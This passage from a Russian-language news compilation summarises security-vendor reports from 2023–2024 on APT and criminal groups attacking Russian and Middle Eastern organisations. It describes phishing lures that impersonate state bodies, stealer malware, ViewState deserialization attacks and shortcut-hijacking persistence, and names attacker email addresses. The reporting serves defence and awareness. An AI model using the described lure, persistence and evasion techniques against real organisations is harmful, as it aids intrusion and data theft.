Также известны случаи, когда злоумышленники маскировали сэмплы Decoy Dog под ISO-образы сервиса iMind для проведения онлайн-встреч, видеоконференций и вебинаров.

В целом исследование Positive Technologies позволило подтвердить 48 успешных атак. Злоумышленники активно атакуют российские ИТ-компании — в первую очередь, подрядчиков критически важных организаций. Предположительно, атакующие нацелены на эти компании для проведения атак типа trusted relationship, считают исследователи.

Распределение жертв по отраслям

«
«Успех подобных атак свидетельствует о слабой или отсутствующей защите пострадавших компаний от атак по цепочкам поставок (trusted relationship — их частный случай), — считает Анастасия Мельникова, директор по информационной безопасности компании SEQ. — А это, в свою очередь, признак неравномерного отношения к информбезопасности критической инфраструктуры в целом. Любая система надежна ровно настолько, насколько надежно ее слабейшее звено. Справедливости ради, 48 успешных атак за три года целенаправленной активности — не так много, но — намного больше, чем должно быть».
»

Атакующим удается длительное время сохранить присутствие в критически важных российских организациях.

«
«Несмотря на то что практически весь инструментарий Hellhounds основывается на open-source-проектах, атакующим удается достаточно качественно его модифицировать, что способствует обходу средств защиты и долгому скрытому присутствию в скомпрометированных организациях», — отметили исследователи.[2]
»

За российскими компаниями ведется шпионаж

Группировка киберзлоумышленников Sapphire Werewolf переписала стилер с открытым исходным кодом для шпионажа за российскими компаниями. С начала весны 2024 года группировка атаковала российские компании уже более 300 раз. Об этом 28 мая 2024 года сообщила пресс-служба депутата ГосДумы РФ Антона Немкина.

В ходе мониторинга киберинцидентов стало известно, что группировка злоумышленников Sapphire Werewolf рассылала сотрудникам российских компаний фишинговые письма, содержащие ссылки, созданные сервисом-сокращателем «T.L.Y». Пользователи считали, что скачивают официальный документ, однако вместо этого загружался вредоносный вирус. При попытке его открытия в системе ПК устанавливалось вредоносное программное обеспечение, цель которого – кража данных (стилер Amethyst), рассказали в пресс-службе BI.ZONE.

При этом, чтобы не вызвать дополнительных подозрений одновременно с загрузкой вирусного ПО, на ПК действительно открывался отвлекающий документ – постановление о возбуждении исполнительного производства, листовка ЦИК или указ президента Российской Федерации. А Amethyst при этом собирал со скомпрометированного устройства важную информацию. Например, базы данных паролей, файлы-куки, историю браузера, сохранённые страницы, текстовые и другие документы, отметили в BI.ZONE.

Стилер – это вирусное программное обеспечение, которое используется злоумышленником для хищения персональных сведений пользователя, включая логины и пароли, пояснил Антон Немкин.

«
Опасность стилеров в том, что, будучи закодированными, они совершенно спокойно могут обходить антивирусную защиту. Именно за счет этого качества данный тип атак распространяется особенно быстро. Думаю, что стилеры – одна из ключевых угроз информационной безопасности как для рядовых пользователей, так и для организаций. При этом вариантов стилеров много. Например, стилер может мимикрировать под приложение или расширение для браузера, или под zip-архив. Фактически под любой загружаемый файл, – рассказал депутат.
»

По словам Немкина, распространение стилеров, как правило, происходит за счет фишинговых инструментов.

В 2023 году группировка злоумышленников Rare Wolf совершила как минимум 90 атак с похожим сценарием, напомнил Немкин.

По его словам, несмотря на опасность стилеров, существующие на рынке решения позволяют их распознать и заблокировать.

«
Помимо этого, важен постоянный мониторинг систем на предмет вредоносного ПО, а также создание автономных резервных копий. Наконец, основная превентивная мера недопущения подобных атак – развитие цифровых компетенций персонала. Уже не раз отмечалось, что фишинг является одной из ключевых возможностей получения несанкционированного доступа к данным систем. И вина этому – некомпетентность сотрудников, которые не просто открывают подозрительные письма, но и переходят по ссылкам из них, – пояснил депутат.
»

Прогосударственная группировка Shedding Zmiy атаковала десятки российских организаций

Эксперты центра исследования киберугроз ГК «Солар» выявили деятельность прогосударственной высокопрофессиональной группы Shedding Zmiy, которая шпионит за российскими организациями минимум с 2022 года. На счету хакеров несколько десятков кибератак на госсектор, промышленность, телеком и другие отрасли. Скомпрометированные данные они использовали в последующих атаках, а также выкладывали их публично. Об этом «Солар» сообщил 24 мая 2024 года.

С 2022 года по май 2024 года специалисты ГК «Солар» расследовали уже семь инцидентов, связанных с Shedding Zmiy. Поначалу казалось, что за атаками стоит группировка Cobalt (exCobalt), так как уже в первом расследованном инциденте фигурировал ее «фирменный» бэкдор CobInt. Однако дальнейшие расследования выявили разницу в мотивах. По сравнению с Cobalt, нацеленной на финансовую выгоду, группа, названная впоследствии Shedding Zmiy, интересовалась не деньгами – она охотилась за данными.

Хотя в каждой атаке Shedding Zmiy старалась действовать иначе, чем в предыдущей, эксперты ГК «Солар» быстро стали замечать следы использования одних и тех же вредоносных техник, инструментов, сетевой инфраструктуры и названий компонентов. По этим признакам семь на первый взгляд разных инцидентов в конце концов были объединены в один кластер под именем Shedding Zmiy. По итогам работ специалисты ГК «Солар» помогли пострадавшим организациям избавиться от следов присутствия группировки и дали рекомендации по совершенствованию киберзащиты ИТ-периметров.

Проведенные расследования показали, что группировка представляет серьезную угрозу для российской инфраструктуры. Она применяет как публично доступное ВПО, так и уникальное, разработанное специально под конкретные цели (включая загрузчики, бэкдоры и веб-шеллы). Для загрузки вредоносов на системы жертвы иногда использует скомпрометированные легитимные серверы. Также хакеры эксплуатируют специфичную не закрытую вендором уязвимость в ASP.NET: такие атаки сложно выявлять и реагировать на них.

Всего эксперты ГК «Солар» обнаружили следы использования 35 различных инструментов для разведки, доставки вредоносного ПО, скрытного горизонтального продвижения внутри сети и похищения данных. Для проникновения в сеть, повышения привилегий и закрепления, атакующие использовали 20 известных уязвимостей в распространенном корпоративном ПО.

При этом Shedding Zmiy умеет запутывать следы. Группировка владеет обширной сетью командных серверов на территории России, арендует ресурсы у различных хостинг-провайдеров и на облачных платформах. Это помогает хакерам обходить блокировки атак по территориальному признаку (по GeoIP).

Shedding Zmiy также активно прибегает к высокопрофессиональной социальной инженерии. Так для одной из атак хакеры создали фейковый Telegram-профиль, выдавая себя за специалиста ИБ-службы, и «выпросили» у сотрудника компании пароль от учётной записи. Используя скомпрометированную учётку, злоумышленники успели побывать еще на нескольких хостах, где разместили ВПО.

Помимо этого, группа была замечена в эксплуатации доверительных отношений между организациями (атаки типа Trusted Relationship). В одном из кейсов, заразив сеть телеком-провайдера, хакеры попытались атаковать ещё три организации, разослав из взломанной сети несколько десятков писем с вредоносными вложениями.

«
В процессе расследований мы нашли как знакомые по деятельности группы Cobalt вредоносные инструменты, так и не встречавшиеся ранее уникальные образцы ВПО. В частности, бэкдор Bulldog и загрузчик XDHijack. Кроме того, группировка разработала целый фреймворк для эксплуатации уязвимости десериализации VIEWSTATE. Всё это говорит о высоком профессионализме злоумышленников и немалых ресурсах, которые они инвестируют в разработку своего арсенала, —пояснил эксперт группы анализа ВПО центра исследования ГК «Солар» Антон Каргин.
»

Азиатская группировка Obstinate Mogwai использует уязвимость десятилетней давности в целевых атаках на российские компании

Эксперты центра исследования киберугроз ГК «Солар» заблокировали шпионскую активность азиатской группировки Obstinate Mogwai в инфраструктуре телеком-оператора. Об этом ГК «Солар» сообщила 17 мая 2024 года. В атаке хакеры использовали старую, но не полностью устраненную вендором уязвимость десериализации в параметре ViewState (управляет состоянием веб-страниц среды ASP.NET, разработанной Microsoft). Она позволяет выполнять любые действия в атакованной системе – на сервере электронной почты Microsoft Exchange или веб-странице на базе ASP.NET. При этом сам факт ее эксплуатации крайне непросто обнаружить, а методика реагирования до сих пор не была подробно описана в профильных сообществах.

В конце 2023 – начале 2024 года эксперты «Солар» проводили расследование APT-атаки группировки Obstinate Mogwai на российскую телеком-компанию, среди клиентов которой – органы госвласти. В ходе работ специалисты обнаружили признаки успешной эксплуатации уязвимости параметра ViewState, которая известна еще с 2014 года. Она позволяет злоумышленникам исполнять произвольный код в системе и впоследствии красть, подменять или портить данные.

Расследование началось после того, как средства защиты зафиксировали в инфраструктуре телеком-компании подозрительную активность. К тому моменту злоумышленники уже создавали «плацдарм» для похищения конфиденциальных данных из самой компании и у ее клиентов. Несколько раз эксперты «Солар» находили вредоносные инструменты группировки в атакованной сети и удаляли их. Но через некоторое время Obstinate Mogwai возвращались, пока все пути для них не были окончательно закрыты. За настойчивость команда «Солар» назвала группировку Obstinate Mogwai («упрямый демон»).

Для проникновения в сеть хакеры использовали уязвимость десериализации ненадежных данных в параметре ViewState среды ASP.NET. Сериализация в программировании – это процесс преобразования состояния объекта в форму, пригодную для сохранения или передачи, а десериализация – это процесс обратного преобразования данных в объект. Это необходимо для оптимизации приложений (например, при их взаимодействии друг с другом). Однако эти процессы часто содержат уязвимости, позволяющие злоумышленникам модифицировать данные и при десериализации исполнять произвольный код.

Уязвимость была частично закрыта в 2014 году. Тогда компания Microsoft, разработчик платформы ASP.NET, добавила в ее фреймворк механизм MAC-валидации данных при десериализации. Но оказалось, что злоумышленники могут обойти этот механизм, если знают ключи валидации ViewState. Для их получения нужно либо взломать IIS-сервер с ключами, либо добраться до него, взломав другие части сети организации. Возможно, осознавая сложность эксплуатации уязвимости, производитель оставил ее в статусе Won’t Fix (не будет исправлена). Однако практика показала, что такие целевые атаки вполне реальны – на сегодня в мире известно не менее 8 подобных кейсов.

В данном расследовании следы использования уязвимости десериализации ViewState обнаружились, когда злоумышленники стали отправлять на атакованную систему сериализованные инструкции для задания определенных настроек (гаджеты). В записях журналов Windows эксперты обнаружили, что после десериализации эти инструкции исполняются. В соответствии с логикой ASP.NET для успешной работы подобных гаджетов требуются ключи валидации. Эти обстоятельства и указали на возможный вектор атаки.

Кроме того, в определенный момент гаджет который позволял атакующим удаленно выполнять код с помощью десериализации, перестал работать правильно. Благодаря этому событию специалисты «Солар» сумели извлечь вредоносную нагрузку из сериализованных данных, понять, как Obstinate Mogwai выполняли команды на сервере заказчика, и окончательно пресечь эту активность.

«
У этой уязвимости любопытный статус: c одной стороны она старая и формально не является критической, что создаёт впечатление её относительной безопасности. С другой – она даёт злоумышленникам немало возможностей для развития атаки. Исчерпывающих инструкций по обнаружению и пресечению атак через ViewState в открытом доступе мы не нашли, поэтому с помощью нашего исследования хотим закрыть этот пробел, — сказал Антон Каргин, эксперт группы анализа ВПО центра исследования ГК «Солар».
»

Киберпреступники нацелены на телекоммуникации и военно-промышленный комплекс на Ближнем Востоке

Специалисты экспертного центра безопасности Positive Technologies (PT Expert Security Center, PT ESC) провели всестороннее исследование деятельности APT-группировок, нацеленных на организации Ближнего Востока. Эксперты отметили, что 88% исследованных группировок атакуют Саудовскую Аравию, а в топ-5 атакуемых отраслей входят госучреждения, промышленность, телекоммуникации, военно-промышленный и топливно-энергетический комплексы. Для получения первоначального доступа в инфраструктуру злоумышленники в основном делают фишинговые рассылки и используют недостатки в общедоступных приложениях. Об этом Positive Technologies сообщили в марте 2024 года.

По данным анализа, в топ-7 целей злоумышленников вошли Саудовская Аравия (88%), ОАЭ (75%), Израиль (63%), Иордания (56%), Египет (50%), Кувейт (50%) и Ливан (44%).

«
Подавляющее большинство рассмотренных APT-группировок, действующих в странах Ближнего Востока, хотя бы раз совершали атаки на госучреждения (94%) и промышленность (81%), а 69% атаковали топливно-энергетический комплекс, — сказала Яна Авезова, старший аналитик исследовательской группы Positive Technologies. — Стоит отметить, что государственные учреждения являются наиболее привлекательными целями для всех злоумышленников: на их долю в 2022–2023 годах пришлось 22% от общего числа атак на организации стран Ближнего Востока.
»

Как отмечается в исследовании, в пятерку наиболее атакуемых отраслей вошли также телекоммуникационные компании и военно-промышленный комплекс: их атаковала каждая вторая группировка.

По мнению экспертов Positive Technologies, ВПК оказался в топе атакуемых отраслей из-за специфики региона. Ближневосточные СМИ, по сравнению с другими регионами, также часто становятся целями атак и исторически сохраняют высокое место в рейтинге. Повышенный интерес киберпреступников к телекоммуникационной отрасли специалисты связывают с атаками группировок китайского происхождения, поскольку телекоммуникации издавна были одной из их главных целей.

По данным анализа Positive Technologies, для получения первоначального доступа 69% группировок делают фишинговые рассылки, 31% используют недостатки в общедоступных приложениях, а 19% размещают вредоносное ПО на профильных веб-ресурсах.

«
Комплексные целенаправленные атаки начинаются с разведки, — сказал Александр Бадаев, специалист отдела исследования угроз информационной безопасности экспертного центра безопасности Positive Technologies (PT Expert Security Center). — Атакующие могут проводить широкомасштабные сетевые сканирования в поисках подходящих целей. В результате у злоумышленников появляется информация, которой достаточно для начального этапа проникновения. К такой информации относится, например, установленное на целевом сервере программное обеспечение и его версии, подверженные известным уязвимостям. За разведкой следует этап подготовки инструментальной базы для проведения атак. Злоумышленники могут регистрировать поддельные домены и создавать учетные записи электронной почты или аккаунты в социальных сетях для проведения целенаправленного фишинга.

»

По словам эксперта, после получения первоначального доступа атакующие стремятся закрепиться в инфраструктуре. Для закрепления 69% APT-группировок используют планировщик заданий (компонент операционной системы, позволяющий запускать программы или скрипты при выполнении определенного условия), как в случае с кампанией против правительства ОАЭ, когда группировка OilRig создавала запланированную задачу Microsoft Edge Update Service, которая срабатывала каждые пять минут и запускала вредоносное ПО. Большая часть злоумышленников (56%) настраивали автозагрузку вредоносных программ. Треть APT-группировок (31%) для закрепления в системе компаний-жертв настраивали срабатывание вредоносного кода при наступлении определенного события.

После проникновения в корпоративную сеть злоумышленники изучают устройства, к которым удалось получить доступ, чтобы понять, как действовать дальше. Как показал анализ Positive Technologies, прежде всего атакующих интересуют данные об операционной системе и архитектуре скомпрометированного узла, а также сведения о версиях ПО, установленных патчах и пакетах обновлений — эту технику используют 94% группировок. Большое число группировок (81%) стараются идентифицировать пользователей скомпрометированного узла и определить их степень активности, 63% атакующих изучают процессы, запущенные на скомпрометированных узлах, 56% анализируют файлы и каталоги в поисках полезной информации.

Как отметили эксперты PT Expert Security Center, для APT-группировок важно оставаться незамеченными в скомпрометированной среде как можно дольше. Они прибегают к различным способам сокрытия следов присутствия. Как правило, злоумышленники предварительно тестируют образцы своих вредоносных программ и впоследствии модифицируют их, чтобы обойти обнаружение антивирусными решениями. Распространенный способ — замаскировать вредоносное ПО под легитимные файлы или приложения. Большинство (56%) APT-группировок удаляют признаки своей активности: чистят журналы событий и историю сетевых соединений, изменяют временные метки. Эти действия впоследствии значительно усложняют специалистам по кибербезопасности расследование инцидентов.

Для борьбы со сложными целенаправленными атаками и построения эффективной системы защиты от них специалисты Positive Technologies рекомендуют организациям обратить внимание на основы результативной кибербезопасности, которая включает в себя:

  • Управление активами.
  • Мониторинг и реагирование на инциденты.
  • Обучение кибербезопасности.
  • Оценку защищенности.

Иностранная хакерская группировка шпионила за российским ведомством

Эксперты центра исследования киберугроз Solar 4RAYS ГК «Солар» обнаружили иностранных хакеров в инфраструктуре одного из органов исполнительной власти. Злоумышленники использовали сложно закамуфлированное самописное ПО для шпионажа, а для его удаленного управления – скомпрометированные серверы организаций в разных странах. Об этом «Солар» сообщил 6 марта 2024 года.

Группировка существует как минимум три года, но данных для точной ее аттрибуции пока недостаточно, поэтому кластер этой активности временно назван NGC2180. К началу марта 2024 года все обнаруженное вредоносное ПО обезврежено, затронутые системы вернулись в работу.

В конце 2023 года специалисты Solar 4RAYS проводили комплексный анализ инфраструктуры одного из российских ведомств, оперирующих критичными данными. В ходе работ на одном из компьютеров были найдены признаки взлома. Более глубокое исследование обнаружило в ведомственной сети несколько образцов многоступенчатого вредносного ПО (ВПО), названного экспертами DFKRAT. На финальной стадии развития атаки вредонос разворачивает имплант, предоставляющий злоумышленнику возможности манипуляций в атакуемой системе (от хищения пользовательских данных до загрузки дополнительного ВПО).

Обнаруженная версия вредоноса ранее нигде не встречалась. Зато в публичном пространстве удалось найти предыдущие его варианты и проследить их эволюцию, начиная с 2021 года. С каждой новой версией ВПО становилось более сложным. В частности, в последнем экземпляре злоумышленники использовали технику DLL Side-Loading (размещение вредоносного кода в папке с легитимной программой) и отказались от поэтапной передачи команд с сервера управления на целевую систему. Такие действия разработчиков ВПО говорят о попытках скрыть вредоносную активность от средств защиты на конечном хосте.

Один из найденных образцов предыдущей версии ВПО доставлялся на компьютер жертвы с помощью фишингового письма, начиненного загрузчиком. В последней атаке вектор заражения остался неизвестным.

«
Нам удалось найти и проанализировать фрагмент кода управляющего сервера. Файл был загружен на один публичный сервис под именем config.jsp с IP-адреса Саудовской Аравии. Анализ сетевой инфраструктуры показал, что, вероятно, это была промежуточная жертва, сервер которой скомпрометировали для размещения на нем управляющего центра (С2). В актуальной версии импланта для координации его работы использовался взломанный компонент сервера Института нанонауки и нанотехнологий Национального центра научных исследований «Демокрит» в Греции, — отметил начальник отдела анализа угроз центра Solar 4RAYS ГК «Солар» Алексей Фирш.
»

Активность NGC2180 на протяжении минимум последних трех лет говорит о высокой организованности кибергруппировки. А компрометация легитимных серверов для развертывания инфраструктуры С2, а также нацеленность NGC2180 на значимые государственные структуры указывают на системный подход и возможную политическую мотивацию группы.

«
На основании анализа фрагмента управляющего сервера мы полагаем, что в дикой природе существует еще больше образцов, относящихся к описанному кластеру. Архитектура ВПО качественно перерабатывалась хакерами от атаки к атаке: методы удаленного управления, доставки и развертывания совершенствовалась – неизменным оставалось только ядро самого импланта. Все это говорит о том, что за этими атаками стоит хорошо организованная группа, располагающая большим запасом ресурсов, которые, как мы знаем из других публичных исследований, часто выделяются при поддержке государства. В будущем мы ожидаем больше атак от NGC2180, поэтому призываем ИБ-сообщество воспользоваться индикаторами, приведенными в нашем исследовании, для выявления следов присутствия данной группировки, — предупредил эксперт группы анализа ВПО центра исследования Solar 4RAYS ГК «Солар» Дмитрий Маричев.
»

Кибергруппировка рассылает российским промышленным компаниям очень убедительные фишинговые письма якобы от госорганов

Компания BI.Zone, российская компания по управлению цифровыми рисками, 30 января 2024 года сообщила о сравнительно новой киберкампании, нацеленной на российские предприятия. Стоящая за ней группировка Scaly Wolf («Чешуйчатый волк») охотится за корпоративными данными. Большинство объектов атак — промышленные и логистические компании из России. Последняя такая атака отмечена в январе 2024 года.

В то время как злоумышленники используют более-менее стандартный метод первоначальной атаки — фишинг, есть два обстоятельства, которые значительно отличают деятельность этой группировки от других. Во-первых, письма замаскированы под документы государственных органов: запросы и требования Роскомнадзора, Следственного комитета РФ и Военной прокуратуры РФ, а также судебные постановления и другие предписания регуляторов.

Во-вторых, фишинговые письма отличаются очень высоким уровнем исполнения.

«
«Отличительная черта Scaly Wolf — высокий уровень юридической грамотности, с которой составлялись письма и поддельные документы. Во всех случаях текст письма выглядит крайне убедительно и вызывает доверие у пользователей. Это побуждает жертву следовать инструкции из письма и открыть зашифрованный архив, где якобы содержатся документы. На самом деле там находится вредоносное ПО — стилер White Snake, который позволяет злоумышленникам получать доступ сразу к нескольким корпоративным ресурсам, например электронной почте и CRM-системе»[3], — говорится в публикации BI.Zone.
»

White Snake — популярный в киберкриминальной среде «инфостилер», то есть ПО для кражи данных.

Характерно, что этот вредонос распространяется на типичных для русскоязычного киберкриминала условиях: не использовать против целей в РФ и странах СНГ. Для этого реализована техническая мера — функция, которая немедленно прекращает работу программы, если ее запускают на устройстве с IP-адресом из «запрещенных», как выразились авторы публикации, регионов.

Однако операторы Scaly Wolf эту функцию попросту отключили, оставив на месте все остальное. Иными словами, они используют «пиратскую» версию White Snake и с немалым успехом.

«
То, что русскоязычная группировка атакует цели внутри РФ, указывает, что для них не существует каких-либо правил и этикета, — говорит Алексей Водясов, технический директор компании SEQ. — Впрочем, нет ничего нового в том, что одни представители киберкриминала обманывают других: так было и будет всегда просто потому, что это в первую очередь криминал, и только во вторую — «кибер».
»

В BI.Zone полагают, что Scaly Wolf продолжит осуществлять атаки на российские организации еще долгое время. Методы группировки сохраняют эффективность, и ничто не свидетельствует о том, что это может как-то поменяться.

2023

Хакеры атаковали машиностроительную компанию с помощью писем от имени Следственного комитета РФ

В октябре 2023 года в компанию «Доктор Веб» обратилось российское предприятие машиностроительного сектора с подозрением на присутствие ВПО на одном из своих компьютеров. Специалисты расследовали этот инцидент и установили, что пострадавшая компания столкнулась с целевой атакой. Об этом представители «Доктор Веб» сообщили TAdviser 11 марта 2024 года.

В ходе атаки злоумышленники рассылали по электронной почте фишинговые сообщения с прикрепленной вредоносной программой, отвечающей за первоначальное заражение системы и установку в нее других вредоносных инструментов.

Как выяснили эксперты «Доктор Веб», целью этой атаки был сбор чувствительной информации о сотрудниках, получение данных об инфраструктуре компании и ее внутренней сети. Кроме того, был зафиксирован факт выгрузки данных с зараженного компьютера ― как в виде хранившихся на компьютере файлов, так и в виде снимков экрана, созданных во время работы ВПО.

В начале октября 2023 года злоумышленники отправили на электронный адрес пострадавшей компании несколько фишинговых писем с темой «расследования» неких уголовных дел по уклонению от уплаты налогов. Письма отправлялись якобы от имени следователя Следственного Комитета Российской Федерации и содержали два вложения. Первым был защищенный паролем zip-архив. Он скрывал в себе вредоносную программу, при запуске которой начиналось заражение системы. Вторым был pdf-документ, который не являлся вредоносным. Он содержал фишинговый текст о том, что вся информация об «уголовном деле» находится в архиве, и побуждал открыть вредоносную программу из него.

Самое первое фишинговое письмо содержало архив «Трeбoвaниe 19098 Cлед ком РФ от 02.10.23 ПАРОЛЬ - 123123123.zip». В свою очередь, расположенная в нем троянская программа скрывалась в файле «Перечень юридических лиц и предприятий, уклонение от уплаты налогов, требования и дополнительные.exe».

Одним из последних отправленных сообщений стало следующее:

К нему был прикреплен фишинговый pdf-документ «Требование следователя, уклонение от уплаты налогов (запрос в рамках УД).pdf» и zip-архив «Трeбoвaниe 19221 СК РФ от 11.10.2023 ПАРОЛЬ - 123123123.zip» с таким содержимым:

Как и в более ранних сообщениях, пароль для извлечения файлов из архива атакующие указали и в его названии, и в имени документа «Пароль для открытия 123123123.odt». Сам этот документ, как и файлы «Права и обязанности и процедура ст. 164, 170, 183 УПК РФ.pdf» и «СК РФ.png», не являлись вредоносными. В этом архиве находилось две копии вредоносной программы: «Перечень предприятий, уклонение от уплаты налогов, а также дополнительные материалы.exe» и «Дополнительные материалы, перечень вопросов, накладные и первичные документы.exe».

По информации «Доктор Веб», во всех случаях распространяемым злоумышленниками вредоносным приложением был Trojan.Siggen21.39882. Эта вредоносная программа, известная как WhiteSnake Stealer, продается в теневом сегменте интернета (Даркнете) и используется для кражи учетных записей от различного ПО, а также других данных. Кроме того, она может загружать и устанавливать на атакуемые компьютеры другие вредоносные приложения. В рассматриваемой целевой атаке ей отводилась роль первой ступени заражения. Получив соответствующие команды, вредоносная программа собрала и передала злоумышленникам информацию о конфигурации профилей Wi-Fi-сетей инфицированной системы, а также пароли доступа к ним. Затем она запустила SSH-прокси-сервер и установила в систему вторую ступень.

Второй ступенью и одновременно главным инструментом злоумышленников, как выяснили эксперты «Доктор Веб», стала вредоносная программа-бэкдор JS.BackDoor.60 ― через нее проходило основное взаимодействие между атакующими и зараженным компьютером. Одной из особенностей бэкдора является то, что он использует собственный фреймворк на языке JavaScript. Троян состоит из основного обфусцированного тела, а также вспомогательных модулей, которые благодаря специфике архитектуры вредоносной программы одновременно являются и ее частью, и задачами, которые та исполняет через общие с ними JavaScript-функции. Новые задачи поступают трояну с управляющего сервера и фактически превращают его в многокомпонентную угрозу с расширяемой функциональностью, что позволяет применять его в качестве мощного инструмента кибершпионажа.

Интересен и механизм, с помощью которого JS.BackDoor.60 обеспечивал возможность своего автозапуска. Наряду с одним из традиционных способов ― внесением необходимых изменений в реестр Windows ― троян особым образом модифицировал файлы ярлыков (.lnk). Для этого он проверял содержимое ряда системных каталогов, включая каталог рабочего стола и панели задач, и всем найденным в них ярлыкам, кроме Explorer.lnk или Проводник.lnk, целевым приложением для запуска назначал wscript.exe. При этом для его запуска указывались специальные аргументы, одним из которых был альтернативный поток данных (ADS), в который записывалось тело бэкдора. В результате изменений модифицированные ярлыки вначале запускали JS.BackDoor.60, а уже после ― исходные программы.

На протяжении всей атаки злоумышленники активно направляли бэкдору различные команды и с его помощью похитили с зараженного компьютера содержимое десятков каталогов, которые содержали как личные, так и корпоративные данные. Кроме того, в «Доктор Веб» зафиксировали факт создания трояном снимков экрана (скриншотов).

Дополнительным инструментом слежки в рассматриваемой атаке стала вредоносная программа BackDoor.SpyBotNET.79, которая использовалась для аудиопрослушивания и записи разговоров через подключенный к зараженному компьютеру микрофон. Этот троян записывал аудио только в том случае, если фиксировал определенную интенсивность звука ― в частности, характерную для голоса.

При этом атакующие пытались также заразить систему трояном-загрузчиком Trojan.DownLoader46.24755, однако из-за возникшей ошибки сделать это им не удалось.

Хронология атаки представлена на следующей схеме:

Хронология получения задач трояном JS.BackDoor.60:

В целом проведенный анализ не показал однозначную причастность к данной атаке какой-либо из ранее известных APT-группировок, заключили специалисты «Доктор Веб».

По их словам, использование вредоносных инструментов, которые доступны в качестве услуги на коммерческой основе (MaaS ― Malware as a Service), таких как Trojan.Siggen21.39882, позволяет даже относительно неопытным злоумышленникам совершать весьма чувствительные атаки как на бизнес, так и на государственные структуры. В свою очередь, социальная инженерия по-прежнему представляет серьезную угрозу.

«
Это относительно простой, но эффективный способ обойти выстроенную защиту, который могут использовать как опытные, так и начинающие киберпреступники. В связи с этим особенно важно обеспечивать защиту всей инфраструктуры предприятий, в том числе рабочих станций и шлюзов электронной почты. Кроме того, рекомендуется проводить периодический инструктаж сотрудников по теме информационной безопасности и знакомить их с актуальными цифровыми угрозами. Все эти меры помогут снизить вероятность возникновения киберинцидентов, а также минимизировать ущерб от атак, ― добавили в «Доктор Веб».
»

Кибершпионская группировка атакует российские компании, прикрываясь темой поддержки участников СВО

Компания F.A.C.C.T. зафиксировала атаки шпионской группы Cloud Atlas на российское агропромышленное предприятие и исследовательскую госкомпанию. Обе рассылки были перехвачены системой защиты от сложных и неизвестных киберугроз F.A.C.C.T. Managed XDR. Об этом компания сообщила 19 декабря 2023 года.

По информации F.A.C.C.T., Cloud Atlas — прогосударственная APT-группа, специализирующаяся на кибершпионаже и краже конфиденциальной информации. По данным исследователей, активна как минимум с 2014 года. Чаще других целями Cloud Atlas становились промышленные предприятия и госкомпании в России, Белоруссии, Азербайджане, Турции и Словении[4].

В качестве основного вектора атаки Cloud Atlas отдает предпочтение точечной почтовой рассылке с вредоносным вложением. В рамках кампании злоумышленники использовали адреса, зарегистрированные через почтовые сервисы antonowadebora@yandex.ru и mil.dip@mail.ru и две актуальные темы — поддержку участников СВО и воинский учет.

Image:Скриншот_письма_с_вложением_для_профсоюзных_лидеров.png
Скриншот письма с вложением для профсоюзных лидеров с просьбой оказать поддержку участникам СВО и членам их семей

В первом письме злоумышленники от имени представителей "Московской городской организации Общероссийского профессионального союза работников государственных учреждений" предлагают организовать сбор открыток и поздравлений участникам СВО и членам их семей. Указанные в письме контакты реальные — их можно найти в свободном доступе.

Скриншот письма с изменениями в законодательстве о введении воинского учета и бронировании граждан, пребывающих в запасе

В другой почтовой рассылке злоумышленники представляются "Ассоциацией Учебных Центров" и используют актуальную тему изменений в законодательстве о введении воинского учета и бронировании граждан, пребывающих в запасе.

При открытии пользователем документа от 20.11.2023 из вложения электронного письма происходит загрузка по ссылке удаленного шаблона. Загружаемый по ссылке шаблон является RTF-файлом, содержащим эксплойт уязвимости CVE-2017-11882.

Представлены тренды киберугроз

Топ-10 самых атакуемых отраслей в 2023 году, всплеск кибератак со стороны азиатских хакеров и рост числа инцидентов с разрушительными последствиями для организаций РФ 14 ноября 2023 года предоставила ГК «Солар» и поделилась прогнозами на 2024 год.

Наиболее серьезную киберугрозу для российских организаций представляют профессиональные APT-группировки (Advanced persistent threat, постоянная угроза повышенной сложности). Согласно аналитике центра исследования киберугроз Solar 4RAYS, в 2022-2023 гг. доля APT-атак составила 20% от всех расследуемых инцидентов. Опасность их заключается в том, что определить точки проникновения хакеров в инфраструктуру компании без специализированной экспертизы практически невозможно: злоумышленники либо слишком хорошо заметают следы, либо находятся в инфраструктуре уже настолько долго, что найти их не представляется возможным. Главная цель группировок данного типа – кибершпионаж и кража данных, а основными их жертвами являются телеком-отрасль и госсектор.

По данным телеметрии «Ростелекома», среди продвинутых группировок наиболее активными на территории РФ оказались хакеры из азиатского региона. В первую очередь это китайские группировки. Так, в сентябре 2023 года они запустили очередную кампанию с целью кибершпионажа – ежедневно вредоносным ПО заражалось от 20 до 40 систем российских организаций – и только спустя месяц злоумышленники были замечены вендорами средств защиты, после чего наметился спад их активности.

Image:Image002_(1).jpg

Также весьма активно действует на территории РФ северокорейская группировка Lazarus. За последние 2 года эксперты Solar 4RAYS расследовали несколько связанных с ней инцидентов. Среди жертв были, в частности, государственные органы власти. При этом анализ данных сенсоров показал, что на начало ноября хакеры Lazarus все еще имеют доступы к ряду российских систем.

Image:Image004Solar 4RAYS .jpg

Выявить за шквалом атак непосредственно украинские группировки довольно непросто, так как в их интересах действует огромное число политически мотивированных злоумышленников из разных регионов, отмечают эксперты. Тем не менее, в ряде случаев по косвенным признакам удавалось идентифицировать именно украинских хакеров. Например, они проводили вредоносные рассылки, используя дописанный ими открытый framework Pupy RAT, а недавно им удалось атаковать одного из телеком-операторов, что привело к разрушению части его инфраструктуры.

«
Благодаря телеметрии с сети «Ростелекома», а также с сервисов центра противодействия кибератакам Solar JSOC и платформы Solar MSS мы своевременно не только обнаруживаем уже случившиеся взломы, но и получаем информацию о готовящихся инцидентах и исследуем деятельность хакеров разного уровня, включая APT-группировки, в масштабе страны. Мы прогнозируем, что в 2024 году продвинутые группировки cохранят объемы своих кампаний, а тренд на взлом подрядчиков займет лидирующее место, – сообщил Игорь Залевский, руководитель центра исследования киберугроз Solar 4RAYS ГК «Солар».

»

В ходе SOC-Forum 2023 эксперты ГК «Солар» назвали ТОП-10 наиболее пострадавших от хакеров отраслей за 2022-2023 гг. Большинство кибератак пришлось на государственные организации (44%) и телеком (14%), а также сельское хозяйство (9%) – последнее можно объяснить близостью отрасли к государству. Также в рейтинг попали промышленность (7%), финансовый сектор (7%), и с равными долями в 4% ритейл, сфера услуг, образование, НКО и энергетика.

Image:топ-10 пострадавших отраслей.jpg

Большая часть расследуемых инцидентов связана с кибермошенниками (42,5%) – они обычно зарабатывают на взломах за счет шифрования, кражи и перепродажи данных. Второе место занимают киберхулиганы (30%), которые пытаются привлечь внимание через минимальное воздействие на ИТ-инфраструктуру, например – DDoS-атаки и дефейс сайтов. На третьем месте – профессиональные APT-группировки (20%).

Image:уровни хакеров в расследованиях.jpg

